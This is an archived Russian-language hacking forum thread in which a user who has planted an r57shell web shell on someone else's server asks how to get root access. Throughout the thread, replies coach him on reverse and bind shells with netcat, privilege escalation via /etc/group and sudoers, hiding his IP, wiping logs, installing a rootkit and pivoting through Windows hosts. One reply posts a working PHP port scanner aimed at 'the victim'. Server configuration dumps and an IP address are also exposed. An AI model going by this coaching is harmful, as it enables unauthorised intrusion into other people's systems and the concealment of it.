Просмотр полной версии : Имею пароль рута удалённой машины
Вопрос: как пожно подключиться по SSH или Telnet с правами root?
groundhog
23.01.2009, 18:55
SSH-клиентом или TELNET-клиентом, при условии, что не идёт резка по айпишникам.
SSH-клиентом или TELNET-клиентом, при условии, что не идёт резка по айпишникам.
Ну это понятно. Я ввожу IP сайта в прогу PuTTy, а он не коннектит ни SSH, ни TELNET. Как быть?
Если что на серваке залит r57shell.
groundhog
23.01.2009, 19:06
InFlame, а ты сканил хост? Порты этих сервисов открыты?
gold-goblin
23.01.2009, 19:08
пиля а через шел не проще?
tcp4 0 0 *.1234 *.* LISTEN
tcp4 0 0 *.11457 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp46 0 0 *.443 *.* LISTEN
tcp46 0 0 *.80 *.* LISTEN
tcp4 0 0 *.995 *.* LISTEN
tcp4 0 0 *.110 *.* LISTEN
tcp4 0 0 *.993 *.* LISTEN
tcp4 0 0 *.143 *.* LISTEN
tcp4 0 0 *.25 *.* LISTEN
tcp4 0 0 *.3306 *.* LISTEN
tcp4 0 0 *.21 *.* LISTEN
tcp6 0 0 ::1.953 *.* LISTEN
tcp4 0 0 127.0.0.1.953 *.* LISTEN
tcp4 0 0 127.0.0.1.53 *.* LISTEN
tcp4 0 0 79.135.74.40.53 *.* LISTEN
tcp4 0 0 192.168.0.3.53 *.* LISTEN
Эти порты выдаёт r57shell. Как видно 22 порт открыт, но PuTTy не коннектит.
groundhog
23.01.2009, 19:44
Адрес ты какой вбиваешь?
В виде IP и ***.ru пробовал.
И в чём же проблема? Как подключиться?
AkyHa_MaTaTa
24.01.2009, 17:43
может руту запрешен логин по ssh или telnet(ну это навярняка), или для конекта по ssh идет привязка к ip.
При подключении вылетает ошибка: Time out
AkyHa_MaTaTa
24.01.2009, 18:36
tcp4 0 0 *.1234 *.* LISTEN
tcp4 0 0 *.11457 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp46 0 0 *.443 *.* LISTEN
tcp46 0 0 *.80 *.* LISTEN
tcp4 0 0 *.995 *.* LISTEN
tcp4 0 0 *.110 *.* LISTEN
tcp4 0 0 *.993 *.* LISTEN
tcp4 0 0 *.143 *.* LISTEN
tcp4 0 0 *.25 *.* LISTEN
tcp4 0 0 *.3306 *.* LISTEN
tcp4 0 0 *.21 *.* LISTEN
tcp6 0 0 ::1.953 *.* LISTEN
tcp4 0 0 127.0.0.1.953 *.* LISTEN
tcp4 0 0 127.0.0.1.53 *.* LISTEN
tcp4 0 0 79.135.74.40.53 *.* LISTEN
tcp4 0 0 192.168.0.3.53 *.* LISTEN
Эти порты выдаёт r57shell. Как видно 22 порт открыт, но PuTTy не коннектит.
А что толку,порты то открыты, но может(и наверника) впереди стоит фаервол с фильтрацией по ип, судя по Time out порт закрыт для тебя, если 79.135.74.40 - ип твоего сайта - то там нет открытого порта 22(ssh) для ип моего сокса.
POS_troi
24.01.2009, 18:43
Авторизация по Сертификату.
Ограничение на IP
засветил IP 79.135.74.40
то там нет открытого порта 22(ssh) для ип моего сокса.
Аналогично, Скорее всего SSH только для 192.168.0/24
насколько я знаю, root по умолчанию запрещен доступ по ssh в целях безопасности соития ;)
при идеальных условиях, логинешься под юзером, делаешь su -
вводишь пасс рута
при идеальных условиях, логинешься под юзером, делаешь su -
вводишь пасс рута
Можно поподробней? :)
login: user
pass: ********
user: -su ili -sudo
enter password: passroota
POS_troi
24.01.2009, 19:17
насколько я знаю, root по умолчанию запрещен доступ по ssh в целях безопасности соития
во FreeBSD не по умолчанию.
ТС, а чем тебя криптованный шелл-канал не устраивает?? ведь твои коннекты в логах осядают или ты каждый раз логклинер запускаешь..?? поставь руткит и юзай спокойной ^_^
Я не понял куда вводить логин и пасс? Куда команды вводить su и sudo?
AkyHa_MaTaTa
24.01.2009, 19:26
насколько я знаю, root по умолчанию запрещен доступ по ssh в целях безопасности соития ;)
при идеальных условиях, логинешься под юзером, делаешь su -
вводишь пасс рута
в идеале надо сначало законектится, а у него это не выходит.
пусть через биндшелл или конектбэк шелл )
последний вариант обязан прокатить
А может шелл какой-нибудь посоветуете, в котором можно проделать вышесказанное. То есть войти под рута из-под шелла на php, например. В r57shell не получается.
пусть через биндшелл или конектбэк шелл )
последний вариант обязан прокатить
В r57shell есть такое, вот только я не понимаю как его юзать. Вообще это у меня первый опыт, поручивания серваков... :)
То есть войти под рута из-под шелла на php, например. В r57shell не получается.
школьнег, php интерпретатор работает из под nobody или от userid, но никак из под root ;) если админ не далбаёб и не коперфильддд
POS_troi
24.01.2009, 19:39
Вообще это у меня первый опыт, поручивания серваков...
Главное чтобы не последний
####
####
####
=)
школьнег, php интерпретатор работает из под nobody или от userid, но никак из под root ;) если админ не далбаёб и не коперфильддд
Я имел в виду не просто так войти под root, а используя команду su.
не получицо :)
не парься... заливай биндшелл, запускай его и конектся, а там уже руть
либо делай конектбэк шелл
если ничего не получаеца, отдай шелл мне :) я из него электронную библиотеку сделаю
http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchtype=archives&counts=50&searchvalue=backdoor++
А как воспользоваться встроенным в r57shell бек-коннектом?
нужен netcat
запускаешь его слушать определенный порт у себя на компутере.....
в шеле выставляешь порт, свой айпи и жмахаешь кнопку пуск или что там еще....и у себя в netcat'e юзаешь шелл :)
гугл более ясно тебе бы все это объяснил
А если я в бэк коннекте свой ай пи указал, админы его не спалят?
SpangeBoB
25.01.2009, 15:09
А если я в бэк коннекте свой ай пи указал, админы его не спалят?
Вы ответили на свой вопрос-" в бэк коннекте свой ай пи указал"
POS_troi
25.01.2009, 15:16
А если я в бэк коннекте свой ай пи указал, админы его не спалят?
Свой IP указывать нигде вобще не стоит как вариант юзайте VPN тут на форуме грины какраз предоставляют OpenVPN сервис не дорого.
Вы ответили на свой вопрос-" в бэк коннекте свой ай пи указал"
В каких тогда логах он остаётся?
POS_troi
25.01.2009, 19:02
как вариант /var/log/wtmp, /var/run/utmp и /var/log/lastlog а вобще все зависит от того как система настроена. у меня например не один сервак не пишет только в стандартные логи все заркалируется в дебрях системы
вобщем покапайся в /var/ там много интересного.
да еще и httpd лог
Удачно захожу через бэк-коннект, ввожу команду su, он мне выдаёт: "su: Sorry".
Что мне делать в таком случае?
AkyHa_MaTaTa
25.01.2009, 19:55
Удачно захожу через бэк-коннект, ввожу команду su, он мне выдаёт: "su: Sorry".
Что мне делать в таком случае?
ясный пень что твой бак конект не в входит в группу whel, скорей всего у тебя nobody.
ясный пень что твой бак конект не в входит в группу whel, скорей всего у тебя nobody.
У меня не nobody. Захожу под учёткой сайта.
Тогда как мне под рута зайти?
POS_troi
25.01.2009, 20:05
в файле /etc/group
Нужно добавить твоего пользователя =)
Но так как в этот файл пишет только РУТ то и писать не сможеш =)
У меня не nobody. Захожу под учёткой сайта.
ну не nobody а WWW или HTTPD всеравно не один из этих учеток во Whell никогда сидеть не будет.
AkyHa_MaTaTa
25.01.2009, 20:10
У меня не nobody. Захожу под учёткой сайта.
Тогда как мне под рута зайти?
ну во первых, id, во вторых cat /etc/group ну и возможно
cat /etc/sudoers, что бы можно было о чем судить, если у тебя конечно хватит прав на чтения.
POS_troi
25.01.2009, 20:18
Как вариант рассуждаем:
У нас есть сервак и походу он является университетским тоесть состоит в сети 192.168.0/24.
Вполне возможно и даже скорее всего что в этой сети юзаются компы с Windows Xp и вполне возможно есть дырявая.
Проверяем сервак на предмет наличия популярных сканеров портов и если есть то сканим всю поддсеть, если нет то выход может быть такой
Источник кода security-teams.ne
################################################## ###
#!/usr/local/bin/php
<?
class thread
{
function sock($net,$p)
{
@$sock = fsockopen($net,$p,$errno, $errstr,5);
if($sock == true) {print $p." - open\n";} else { print $p." - close\n"; }
if($p == 21) $this->ftp_valid($sock); else;
@fclose($sock);
}
function self($line)
{
list($code,$mesg)=split(' ',$line,2);
print $code." ".$mesg."\r\n";
return $code;
}
function ftp_valid($sock)
{
print "#############проверка на анонимный FTP доступ############\n";
$line=fgets($sock);
$code = $this->self($line);
if($code == 220)
{
fwrite($sock,"user anonymous\r\n");
$line=fgets($sock);
$code = $this->self($line);
if($code == 331)
{
fwrite($sock,"pass jonny@localhost.com\r\n");
$line=fgets($sock);
$code = $this->self($line);
}
else;
}
else;
print "################################################## ############\n";
}
function open_relay($sock)
{
}
}
if(empty($argv[2]))
{$port = array(21,22,23,24,25,80,81,110,143,135,139,445,330 6,3124,3128,3389,8080);}
elseif($argv[2]=="all")
{
$j=1;
while($j<=10000)
{
$port[]=$j;
$j++;
}
}
else
{ print "Wrong parametr!!!\n";}
$object = new thread();
$i = 0;
if(!empty($argv[1]))
{
$host = $argv[1];
print "Host $host is scanned....\n";
while(isset($port[$i]))
{
$p = $port[$i];
$object->sock($host,$p);
$i++;
}
}
else;
?>
################################################## ###
$ ./ports.php [Адрес жертвы] [port [all]] | grep open
Ищем машины с портами которые как правило юзаются виндами и далее пробуем сплойтами пробить машинку + при удаче установить консольный SSH клиент и юзать связку
WebShell -> Телнет Винды --> SSH WEB сервака
Примерно так..
При условии что SSH тупо не забит только на один IP админа.
cat /etc/group
# $FreeBSD: src/etc/group,v 1.35 2007/06/11 18:36:39 ceri Exp $
#
wheel:*:0:root
daemon:*:1:
kmem:*:2:
sys:*:3:
tty:*:4:
operator:*:5:root
mail:*:6:postfix
bin:*:7:
news:*:8:
man:*:9:
games:*:13:
ftp:*:14:
staff:*:20:
sshd:*:22:
smmsp:*:25:
mailnull:*:26:
guest:*:31:
bind:*:53:
proxy:*:62:
authpf:*:63:
_pflogd:*:64:
_dhcp:*:65:
uucp:*:66:
dialer:*:68:
network:*:69:
audit:*:77:
www:*:80:
nogroup:*:65533:
nobody:*:65534:
messagebus:*:556:
polkit:*:562:
mgradmin:*:1000:
mgrreseller:*:1001:
mgrsecure:*:1002:user_ugkp,user_gras,user_smart,us er_gm144
cyrus:*:60:
postfix:*:125:
maildrop:*:126:
dovecot:*:143:
mysql:*:88:
user_ugkp:*:1004:
user_gras:*:1005:
user_smart:*:1006:
fetchmail:*:124:
squid:*:100:
cups:*:193:
user_gm144:*:1007:
cat /etc/sudoers
cat: /etc/sudoers: No such file or directory
id
uid=1026(user_gm144) gid=1007(user_gm144) groups=1007(user_gm144),1002(mgrsecure)
Что дальше? :)
POS_troi
25.01.2009, 20:48
ну все что осталось это прописать в
/etc/group
wheel:*:0:root,user_gm144
:)
ну все что осталось это прописать в
/etc/group
wheel:*:0:root,user_gm144
:)
Прав не хватает.
POS_troi
25.01.2009, 21:01
Знаю =)
Кстати этот сервер тебе уже поиграться только, утром админ спалит ибо наследил уже хорошо (при учете что админ там есть и ему не пофигу)
ls -l /etc/ssh
Вывод в студию.
Иногда встречаються серваки у которых на sshd_config встречаються права 777 =)
кстати заодно и
cat /etc/ssh/sshd_config
ТС, бросай все это, размагничивай и сжигай комп пока не поздно, хотя.... кароче, наверное, уже выехали :(
POS_troi
25.01.2009, 21:35
кароче, наверное, уже выехали
не пугай так ТС, все когдато игрались =)
И все же мне очень интересно какой там админ, шелл завтра снесут или будет жить =)
Шелл уже 3 дня живёт. И забыл написать, что имею доступ из-под рута к MySQL. Может получиться через MySQL сделать ту запись в файл, чтобы зайти под рута?
Рут мне нужен что бы не просто поиграться. Логи ведь надо почистить все... :rolleyes:
POS_troi
25.01.2009, 22:06
Вывод
ps -U root
В студию, предыдущие из 45 поста тоже желательно
ps -U root
PID TT STAT TIME COMMAND
0 ?? WLs 0:00.01 [swapper]
1 ?? SLs 0:00.01 /sbin/init --
2 ?? DL 0:08.57 [g_event]
3 ?? DL 0:15.62 [g_up]
4 ?? DL 0:16.88 [g_down]
5 ?? DL 0:00.00 [thread taskq]
6 ?? DL 0:00.00 [acpi_task_0]
7 ?? DL 0:00.00 [acpi_task_1]
8 ?? DL 0:00.00 [acpi_task_2]
9 ?? DL 0:00.00 [xpt_thrd]
10 ?? DL 0:00.00 [audit]
11 ?? RL 5588:57.04 [idle: cpu3]
12 ?? RL 5588:40.67 [idle: cpu2]
13 ?? RL 5572:06.55 [idle: cpu1]
14 ?? RL 5521:42.77 [idle: cpu0]
15 ?? WL 63:37.48 [swi4: clock sio]
16 ?? WL 0:00.00 [swi3: vm]
17 ?? WL 0:00.90 [swi1: net]
18 ?? DL 0:08.80 [yarrow]
19 ?? WL 0:00.02 [swi5: +]
20 ?? WL 0:00.00 [swi6: Giant taskq]
21 ?? WL 0:00.00 [swi6: task queue]
22 ?? WL 0:03.67 [swi2: cambio]
23 ?? DL 0:00.00 [kqueue taskq]
24 ?? WL 0:00.00 [irq9: acpi0]
25 ?? WL 0:01.72 [irq16: mpt0]
26 ?? DL 0:00.00 [mpt_recovery0]
27 ?? DL 0:05.90 [em0 taskq]
28 ?? DL 0:25.32 [em1 taskq]
29 ?? WL 0:00.00 [irq23: uhci0 uhci+]
30 ?? DL 0:00.05 [usb0]
31 ?? DL 0:00.00 [usbtask-hc]
32 ?? DL 0:00.00 [usbtask-dr]
33 ?? WL 0:00.00 [irq22: uhci1 uhci3]
34 ?? DL 0:00.05 [usb1]
35 ?? DL 0:00.05 [usb2]
36 ?? DL 0:00.05 [usb3]
37 ?? DL 0:00.05 [usb4]
38 ?? WL 0:00.00 [irq14: ata0]
39 ?? WL 0:00.00 [irq15: ata1]
40 ?? WL 0:00.00 [irq20: atapci1]
41 ?? WL 0:00.00 [swi0: sio]
42 ?? WL 0:00.00 [irq1: atkbd0]
43 ?? WL 0:00.01 [irq12: psm0]
44 ?? DL 0:00.00 [sctp_iterator]
45 ?? DL 0:00.55 [pagedaemon]
46 ?? DL 0:00.00 [vmdaemon]
47 ?? DL 0:00.01 [pagezero]
48 ?? DL 0:01.33
49 ?? DL 0:01.36 [vnlru]
50 ?? DL 8:25.24 [syncer]
51 ?? DL 0:02.00 [softdepflush]
52 ?? DL 0:14.95 [schedcpu]
142 ?? Is 0:00.00 adjkerntz -i
430 ?? Is 0:00.22 /sbin/devd
844 ?? Ss 0:02.34 /usr/sbin/syslogd -l /var/run/log -l /var/named/var/r
1149 ?? Is 0:08.51 /usr/local/libexec/postfix/master
1173 ?? Ss 0:07.31 /usr/local/sbin/dovecot
1174 ?? S 0:08.80 dovecot-auth
1182 ?? Ss 0:05.90 /usr/local/sbin/httpd -DNOHTTPACCEPT
1208 ?? Is 0:00.24 /usr/sbin/sshd
1213 ?? Ss 0:00.93 /usr/sbin/cron -s
1228 ?? Is 0:00.27 /usr/sbin/moused -p /dev/psm0 -t auto
1255 ?? Is 0:00.28 /usr/sbin/inetd -wW -C 60
6163 ?? S 0:00.59 /usr/local/ispmgr/bin/ispmgr
1276 v0 Is+ 0:00.00 /usr/libexec/getty Pc ttyv0
1277 v1 Is+ 0:00.00 /usr/libexec/getty Pc ttyv1
1278 v2 Is+ 0:00.00 /usr/libexec/getty Pc ttyv2
1279 v3 Is+ 0:00.00 /usr/libexec/getty Pc ttyv3
1280 v4 Is+ 0:00.00 /usr/libexec/getty Pc ttyv4
1281 v5 Is+ 0:00.00 /usr/libexec/getty Pc ttyv5
1282 v6 Is+ 0:00.00 /usr/libexec/getty Pc ttyv6
1283 v7 Is+ 0:00.00 /usr/libexec/getty Pc ttyv7
1097 con- S+ 0:25.53 /usr/local/bin/samsdaemon
[B]ls -l /etc/ssh
total 296
-rw-r--r-- 1 root wheel 132839 Feb 24 2008 moduli
-rw-r--r-- 1 root wheel 1533 Feb 24 2008 ssh_config
-rw------- 1 root wheel 668 Jul 31 14:14 ssh_host_dsa_key
-rw-r--r-- 1 root wheel 595 Jul 31 14:14 ssh_host_dsa_key.pub
-rw------- 1 root wheel 520 Jul 31 14:14 ssh_host_key
-rw-r--r-- 1 root wheel 324 Jul 31 14:14 ssh_host_key.pub
-rw------- 1 root wheel 1675 Jul 31 14:14 ssh_host_rsa_key
-rw-r--r-- 1 root wheel 387 Jul 31 14:14 ssh_host_rsa_key.pub
-rw-r--r-- 1 root wheel 3241 Aug 5 11:55 sshd_config
cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.74 2006/07/19 13:07:10 dtucker Exp $
# $FreeBSD: src/crypto/openssh/sshd_config,v 1.47 2006/11/10 16:52:41 des
Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options change a
# default value.
# Note that some of FreeBSD's defaults differ from OpenBSD's, and
# FreeBSD has a few additional options.
#VersionAddendum FreeBSD-20061110
#Port 22
#Protocol 2
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
# HostKey for protocol version 1
#HostKey /etc/ssh/ssh_host_key
# HostKeys for protocol version 2
#HostKey /etc/ssh/ssh_host_dsa_key
# Lifetime and size of ephemeral version 1 server key
#KeyRegenerationInterval 1h
#ServerKeyBits 768
# Logging
# obsoletes QuietMode and FascistLogging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
#PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
#RSAAuthentication yes
#PubkeyAuthentication yes
#AuthorizedKeysFile .ssh/authorized_keys
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#RhostsRSAAuthentication no
# similar for protocol version 2
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# RhostsRSAAuthentication and HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# Change to yes to enable built-in password authentication.
PasswordAuthentication yes
#PermitEmptyPasswords no
# Change to no to disable PAM authentication
#ChallengeResponseAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
# Set this to 'no' to disable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
#UsePAM yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#UsePrivilegeSeparation yes
#PermitUserEnvironment no
Compression yes
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS yes
#PidFile /var/run/sshd.pid
#MaxStartups 10
#PermitTunnel no
# no default banner path
#Banner /some/path
# override default of no subsystems
Subsystem sftp /usr/libexec/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# ForceCommand cvs server
А доступ к мускулу с правами рута что ли ничего не даёт? Например через into outfile подредактировать файл /etc/group.
POS_troi
26.01.2009, 12:16
Для этого процесс мускуля должен быть запущен из под рута ну и иметь его права =)
Поэтому и просил у тебя ps -U чтобы просмотреть а не запущен ли ;)
SSH имеет обычную парольную аутентификацию снаружи закрыт фаерволом.
Еще наводка :
Поищи в /etc/ скриптик с правилами фаервола, при настройке частенько на него ставят 777 и иногда забывают снять.
О.. как называется скрипт можеш глянуть в /etc/rc.conf
cat /etc/firewall.conf
50928 -rw------- 1 root wheel 0 Oct 8 09:53 firewall.conf
Error! Can't read file /etc/firewall.conf
Вот так вот =| Значит облом мне с рутом? =(
поломай еще)
Какие ещё тогда идеи подскажешь? ;)
Приветствую всех! :)
Подскажите, пожалуйста, пытаюсь сделать бэкконнект через r57.
Запускаю NetCat, ввожу nc -l -p 11457, нажимаю Enter и NetCat исчезает.
Далее в самом шелле ничего не меняю в настройках бэкконнекта (порт 11457 и IP здесь всё верно). Жму "Выполнить" и шелл отдаёт мне следующее: "Now script try connect to (здесь IP) port 11457 ..."
Пробовал это сделать на нескольких шеллах и так абсолютно на всех шеллах.
У себя файрвол отключаю.
zeppe1in
28.01.2009, 17:42
Если ssh закрыт фаером то нам поможет датапайп не? или тупо конектим к бинд шелу а оттуда конектим к ssh.
POS_troi
28.01.2009, 17:48
У себя файрвол отключаю.
Пожалуйста, также выкладывайте инфу о вашем подключении к Глобальной сети, ADSL, Dial-UP, Sity Local Network и т.д.
Если юзаете локалку то вполне возможно что на шлюзе порезано все что только можно.
Пожалуйста, также выкладывайте инфу о вашем подключении к Глобальной сети, ADSL, Dial-UP, Sity Local Network и т.д.
ADSL (не локалка)
asdewqaz
27.05.2009, 20:25
Добрый вечер
Странно, когда я ввожу логин и пароль - ssh (putty) и программа сразу выходит. Что делать?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot